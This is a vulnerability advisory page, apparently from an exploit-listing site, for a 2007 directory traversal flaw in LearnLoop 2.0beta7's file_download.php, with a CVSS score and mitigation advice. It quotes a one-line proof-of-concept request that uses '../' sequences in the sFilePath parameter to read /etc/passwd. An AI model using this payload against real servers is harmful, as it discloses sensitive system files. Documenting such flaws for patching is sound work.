header-logo
Suggest Exploit
vendor:
LearnLoop 2.0beta7
by:
Unknown
5.5
CVSS
MEDIUM
Remote File Disclosure
22
CWE
Product Name: LearnLoop 2.0beta7
Affected Version From: 2.0beta7
Affected Version To: 2.0beta7
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

LearnLoop 2.0beta7 (sFilePath) Remote File Disclosure Vulnerability

The vulnerability allows an attacker to disclose files from the target system by manipulating the 'sFilePath' parameter in the 'file_download.php' script. By traversing the directory structure with '../', an attacker can access sensitive files such as '/etc/passwd'.

Mitigation:

The vendor should validate and sanitize user input in the 'sFilePath' parameter to prevent directory traversal attacks. Additionally, access control should be implemented to restrict access to sensitive files.
Source

Exploit-DB raw data:

LearnLoop 2.0beta7 (sFilePath) Remote File Disclosure Vulnerability
http://surfnet.dl.sourceforge.net/sourceforge/learnloop/learnloop2.0beta7.tar.gz
POC : /include/file_download.php?sFilePath=../../../../../../../etc/passwd

# milw0rm.com [2007-11-29]

Navigation

Suggest Exploit

Services By CQR